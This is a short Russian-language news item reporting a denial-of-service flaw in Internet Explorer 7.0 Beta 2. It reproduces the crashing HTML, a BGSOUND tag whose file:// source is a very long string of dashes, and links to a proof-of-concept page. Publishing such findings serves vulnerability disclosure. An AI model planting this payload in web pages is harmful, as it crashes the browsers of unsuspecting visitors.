В выпущенном позавчера Internet Explorer 7.0 Beta 2 уже обнаружена
уязвимость. Отказ от обслуживания возможен при посещении страницы с таким кодом:

<BGSOUND SRC=file://——————————————————
———————————————————————————
———————————————————————————
———————————————————————————
————————————————- >

Пример:


http://www.security-protocols.com/poc/sp-x23.html



Оставить мнение